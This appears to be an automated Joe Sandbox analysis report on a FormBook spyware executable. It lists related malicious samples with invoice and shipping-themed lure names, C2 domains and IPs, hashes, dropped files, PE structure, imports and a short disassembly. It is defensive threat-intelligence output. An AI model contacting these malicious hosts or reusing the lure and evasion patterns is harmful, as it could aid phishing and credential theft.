                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 52s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:fJD7ivEnzm.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@14/9
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 92%
                                                                        • Number of executed functions: 47
                                                                        • Number of non-executed functions: 306
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 92.204.80.11
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • VT rate limit hit for: fJD7ivEnzm.exe
Time | Type | Description
10:34:20 | API Interceptor | 6766668x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.191.244.62 | jpdy1E8K4A.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | enkJ6J7dAn.exe | malicious | FormBook | www.lurknlarkk.xyz/jqkr/
172.191.244.62 | DHL_ 46773482.exe | malicious | FormBook | www.lurknlarkk.xyz/aol7/
172.191.244.62 | CITA#U00c7#U00c3O.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | CYTAT.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | Cotizaci#U00f3n.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | PO# Q919240.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | PAGO $830.900.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
172.191.244.62 | EGCS-875-S5-SMO M2A.exe | malicious | FormBook | www.lurknlarkk.xyz/cjjz/
172.191.244.62 | PO #86637.exe | malicious | FormBook | www.tekilla.wtf/fpzw/
63.250.47.40 | jpdy1E8K4A.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | CITA#U00c7#U00c3O.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | CYTAT.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | Cotizaci#U00f3n.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | ES-241-29335_pdf.exe | malicious | FormBook | www.brupack.online/t8b6/
63.250.47.40 | PO# Q919240.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | PAGO $830.900.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.balclub.top/n6ow/
63.250.47.40 | PO #86637.exe | malicious | FormBook | www.kexweb.top/3bdq/
63.250.47.40 | COTIZACION 290824.exe | malicious | FormBook | www.kexweb.top/3bdq/
                                                                        13.248.169.48jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • www.dyme.tech/h7lb/
                                                                        Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                        • www.extrem.tech/lwlk/
                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                        • www.firstcry.shop/e4x0/
                                                                        presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.sleephygienist.org/9ned/
                                                                        -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                        • www.invicta.world/tcs6/
                                                                        payment copy.exeGet hashmaliciousFormBookBrowse
                                                                        • www.firstcry.shop/e4x0/
                                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.invicta.world/aohi/
                                                                        shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.mynotebook.shop/3q2o/
                                                                        Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.sapatarias.online/3632/
                                                                        shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.sapatarias.online/3632/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.nobartv6.websitejpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 103.224.182.242
                                                                        webredir.vip.gandi.net5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        www.elsupertodo.netjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
                                                                        • 148.72.152.174
                                                                        www.kexweb.topjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ATT-INTERNET4USjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.191.244.62
                                                                        enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.191.244.62
                                                                        https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                        • 13.32.23.51
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 13.184.113.170
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 64.216.147.20
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 63.197.31.26
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 68.120.188.218
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 99.178.79.220
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 99.59.85.179
                                                                        https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                        • 13.32.27.128
                                                                        AMAZON-02UShttps://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                        • 52.28.39.231
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 52.222.236.80
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48
                                                                        tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                        • 18.141.10.107
                                                                        PO59458.exeGet hashmaliciousFormBookBrowse
                                                                        • 3.131.150.69
                                                                        Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                        • 3.160.212.126
                                                                        https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                        • 3.124.134.230
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 52.222.236.120
                                                                        https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                        • 18.202.131.124
                                                                        FIR-069114.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 3.5.184.28
                                                                        HOSTNETNLjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        https://polidos.com/Get hashmaliciousUnknownBrowse
                                                                        • 91.184.0.111
                                                                        CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.200
                                                                        z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                                        • 91.184.0.111
                                                                        firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                        • 91.184.0.99
                                                                        NAMECHEAP-NETUSZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.21.169
                                                                        5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.236.169
                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.47.40
                                                                        ItPTgiBC07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 198.54.122.135
                                                                        N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.19.19
                                                                        q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.122.135
                                                                        RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.238.43
                                                                        8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.192.21.169
                                                                        FDA.exeGet hashmaliciousFormBookBrowse
                                                                        • 198.54.125.199
                                                                        PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                        • 63.250.38.167
                                                                        No context
                                                                        No context
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\fJD7ivEnzm.exe
File Type: data
Category: dropped
Size (bytes): 286720
Entropy (8bit): 7.994432246625071
Encrypted: true
SSDEEP: 6144:opQS3X/b6jTRYqCi34VQ2vW9TSUzWu/48INH:o/QPCioZW5SH8IF
MD5: 9768A43D3B321CFCA91921C63C558FCD
SHA1: 9A123976547AC0487BA16CE1F5F63207E865F1C7
SHA-256: 9F2F66233D42536051255E1335BFDBD7912176279FECD54658EF3440C8C7E3F5
SHA-512: 8120CE81DDBCCDA5A382E52DD80204616CF70DA2430B247460954C31A981F424D050CB9728E72DD08CDA8E1176948A76D6B8034218B047F457DBA35E038DFDD1
Malicious: false
Reputation: low
                                                                        Preview:..w..4Z1A..]....r.H1...r2I...T7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4.1AH^H.9P.;.k.3....Y(;p'&X77S#j+S(<[..#-p%!Yp,\n..af?[>ToE]]p7PE2NJHKG[.gQ&.m73.m%U.P.hT=.[...hW7.(...&5..X" m73.PE2NJH2F.qZ1.IQW.z.2NJH2FR4.1CI[V_7P.6NJH2FR4Z1Q\PWT'PE2.NH2F.4Z!AHPUT7VE2NJH2FT4Z1AHPWTWTE2LJH2FR4X1..PWD7PU2NJH"FR$Z1AHPWD7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2Nd<W>&4Z1%.TWT'PE2.NH2VR4Z1AHPWT7PE2NjH2&R4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AHPWT7PE2NJH2FR4Z1AH
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.5568273994030655
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: fJD7ivEnzm.exe
File size: 1'393'415 bytes
MD5: 46bb75d27887b28474a3eb4570d89ca5
SHA1: ac12d22d8683b2129c848661eb4c130c99fc8923
SHA256: f5d173e1e89e02211fa67806e20fcf4fb9c7dcd656929ffad54840454bae58a9
SHA512: 137977f7ede7770079f01fd3bc0058b23c589d941214dda8cffa125412820838b42b05ab024d449d973b19f01dfabc169075579a0050853b5cf190437615623a
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCUS6oefZVmtR8lcsmSI77N8ix5BYInHIAn4:7JZoQrbTFZY1iaCU9+8kSI77bxfX4
TLSH: 5755F122F9D69036C1B323B19E7FF7AA963D69360336C29723C42D315EA05416B39763
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
Entrypoint disassembly (Instruction):
                                                                        call 00007F5A888C469Bh
                                                                        jmp 00007F5A888BB50Eh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        mov ecx, dword ptr [ebp+10h]
                                                                        mov edi, dword ptr [ebp+08h]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F5A888BB68Ah
                                                                        cmp edi, eax
                                                                        jc 00007F5A888BB826h
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F5A888BB69Eh
                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                        je 00007F5A888BB695h
                                                                        push edi
                                                                        push esi
                                                                        and edi, 0Fh
                                                                        and esi, 0Fh
                                                                        cmp edi, esi
                                                                        pop esi
                                                                        pop edi
                                                                        jne 00007F5A888BB687h
                                                                        jmp 00007F5A888BBA62h
                                                                        test edi, 00000003h
                                                                        jne 00007F5A888BB696h
                                                                        shr ecx, 02h
                                                                        and edx, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F5A888BB6ABh
                                                                        rep movsd
                                                                        jmp dword ptr [00416740h+edx*4]
                                                                        mov eax, edi
                                                                        mov edx, 00000003h
                                                                        sub ecx, 04h
                                                                        jc 00007F5A888BB68Eh
                                                                        and eax, 03h
                                                                        add ecx, eax
                                                                        jmp dword ptr [00416654h+eax*4]
                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                        nop
                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                        nop
                                                                        inc cx
                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                        inc cx
                                                                        add byte ptr [ebx], ah
                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                        inc esi
                                                                        add dword ptr [eax+468A0147h], ecx
                                                                        add al, cl
                                                                        jmp 00007F5A8AD33E87h
                                                                        add esi, 03h
                                                                        add edi, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F5A888BB64Eh
                                                                        rep movsd
                                                                        jmp dword ptr [00000000h+edx*4]
                                                                        Programming Language:
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [C++] VS2010 SP1 build 40219
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x8d41c         | 0x154        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xab000         | 0x9328       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x82000         | 0x844        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x8061c      | 0x80800  | 61ffce4768976fa0dd2a8f6a97b1417a | False    | 0.5583182605787937  | data      | 6.684690148171278  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000         | 0xdfc0       | 0xe000   | 0354bc5f2376b5e9a4a3ba38b682dff1 | False    | 0.36085728236607145 | data      | 4.799741132252136  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x90000         | 0x1a758      | 0x6800   | 8033f5a38941b4685bc2299e78f31221 | False    | 0.15324519230769232 | data      | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xab000         | 0x9328       | 0x9400   | 495451d7eb8326bd9fa2714869ea6de8 | False    | 0.49002322635135137 | data      | 5.541804843154628  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name          | RVA     | Size   | Type                                                                                    | Language | Country       | ZLIB Complexity
RT_ICON       | 0xab5c8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors     | English  | Great Britain | 0.3277027027027027
RT_ICON       | 0xab6f0 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                          | English  | Great Britain | 0.7466216216216216
RT_ICON       | 0xab818 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                          | English  | Great Britain | 0.3885135135135135
RT_ICON       | 0xab940 | 0x668  | Device independent bitmap graphic, 48 x 96 x 4, image size 1152                         | English  | Great Britain | 0.48109756097560974
RT_ICON       | 0xabfa8 | 0x2e8  | Device independent bitmap graphic, 32 x 64 x 4, image size 512                          | English  | Great Britain | 0.5672043010752689
RT_ICON       | 0xac290 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128                          | English  | Great Britain | 0.6418918918918919
RT_ICON       | 0xac3b8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors   | English  | Great Britain | 0.7044243070362474
RT_ICON       | 0xad260 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors   | English  | Great Britain | 0.8077617328519856
RT_ICON       | 0xadb08 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors    | English  | Great Britain | 0.5903179190751445
RT_ICON       | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600                        | English  | Great Britain | 0.5503112033195021
RT_ICON       | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224                        | English  | Great Britain | 0.6050656660412758
RT_ICON       | 0xb16c0 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 1088                        | English  | Great Britain | 0.7553191489361702
RT_MENU       | 0xb1b28 | 0x50   | data                                                                                    | English  | Great Britain | 0.9
RT_DIALOG     | 0xb1b78 | 0xfc   | data                                                                                    | English  | Great Britain | 0.6507936507936508
RT_STRING     | 0xb1c78 | 0x530  | data                                                                                    | English  | Great Britain | 0.33960843373493976
RT_STRING     | 0xb21a8 | 0x690  | data                                                                                    | English  | Great Britain | 0.26964285714285713
RT_STRING     | 0xb2838 | 0x4d0  | data                                                                                    | English  | Great Britain | 0.36363636363636365
RT_STRING     | 0xb2d08 | 0x5fc  | data                                                                                    | English  | Great Britain | 0.3087467362924282
RT_STRING     | 0xb3308 | 0x65c  | data                                                                                    | English  | Great Britain | 0.34336609336609336
RT_STRING     | 0xb3968 | 0x388  | data                                                                                    | English  | Great Britain | 0.377212389380531
RT_STRING     | 0xb3cf0 | 0x158  | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0                        | English  | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84   | data                                                                                    | English  | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14   | data                                                                                    | English  | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14   | data                                                                                    | English  | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14   | data                                                                                    | English  | Great Britain | 1.25
RT_VERSION    | 0xb3f18 | 0x19c  | data                                                                                    | English  | Great Britain | 0.5339805825242718
RT_MANIFEST   | 0xb40b8 | 0x26c  | ASCII text, with CRLF line terminators                                                  | English  | United States | 0.5145161290322581
DLL          | Imports
WSOCK32.dll  | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll  | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll    | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll      | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll  | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL    | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll  | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
